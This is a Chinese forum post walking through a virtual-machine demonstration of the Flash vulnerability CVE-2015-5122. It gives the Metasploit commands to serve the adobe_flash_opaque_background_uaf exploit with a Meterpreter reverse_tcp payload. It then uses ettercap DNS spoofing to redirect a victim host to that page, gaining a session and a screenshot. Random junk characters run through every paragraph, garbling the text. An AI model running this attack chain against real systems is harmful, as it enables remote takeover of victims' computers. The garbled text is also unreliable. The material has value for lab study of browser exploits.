cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

" a- q& x. j8 \* I; B 二、cve2015-5122漏洞实例演示虚拟机 & j5 f6 g+ {! s3 _4 a6 K5 m

- m) v$ _. f. t0 O0 j 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： % V4 V8 f3 [: v2 f* n

4 P0 t- n v! J9 _2 r* x search cve-2015-5122如图： & @5 o0 K; ~8 j% _. x

3 R! k: u. E6 _7 V# {7 V: T, w , v1 \5 m$ i2 ?" S" A, E# C, u

2 s7 X; q2 F \( s# V5 ~+ s; p3 {/ w 下面我们敲如下命令： ; t4 n0 m1 l! R: P: h

, |: N6 ]3 I: d7 C+ Q8 Y+ w use exploit/multi/browser/adobe_flash_opaque_background_uaf 4 T0 s% o F* K/ D. \" J6 K

, e" ?; l. H9 V4 p5 ^! F set PAYLOAD windows/meterpreter/reverse_tcp ; l' ]- t# C( `8 C5 H

# `4 V1 m) P& Z* u; X: s set LHOST 192.168.0.109 $ i4 u' Z) T/ \

; [9 l. V! E% q" a, \" ^" F! j set URIPATH / /*根目录*/ $ b& R1 |8 o' O: V2 G! ?3 H. j Y

9 T; G0 p! z$ G) N; H1 j X+ o- B set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 + T) ~( H i. \! Y& C; o/ }

2 a7 w9 W5 ~& x7 k set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ' H3 K0 @# _$ }. k0 s

4 G; w- ]* c) V 然后show options如图： 1 ]+ I) W0 R5 Q# T) T

: o* k$ d2 N& k# C( \8 s# j; m & |9 C' h3 _ U& H7 R* O5 L

; q- x4 C% V/ b( F& W* q' A 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
( b& s e9 p5 a$ W3 c & d: W/ |( i: K$ n0 B

/ ^$ Z8 f* n7 H | 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 ) I( s G2 M; ~. U

0 f/ O% M' v: n* }% H Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf , ]4 q; }) y. p( {7 _; {/ I, B# g

0 {; A# P4 x/ p % p& E9 e7 y+ |0 w

" e% q b7 j1 G" K7 H 成功了，这时候我们断开ettercap，如图： ! J) Z$ U5 h# u

8 f9 F2 B) `+ }" G/ j; S) J 3 A' P7 U: C y+ n% ~5 C

2 |6 T; M( {2 F* a7 x Screenshot如图： ( }! v' t7 a Q9 ^6 Q

8 @8 K0 o5 Q [" Y+ u3 @8 i# j ) B/ P `7 x1 N# v8 F

p: ?. Q2 `5 I- S( X% O ; t" U D5 s9 H' h" _. v

		自动登录	找回密码
密码			立即注册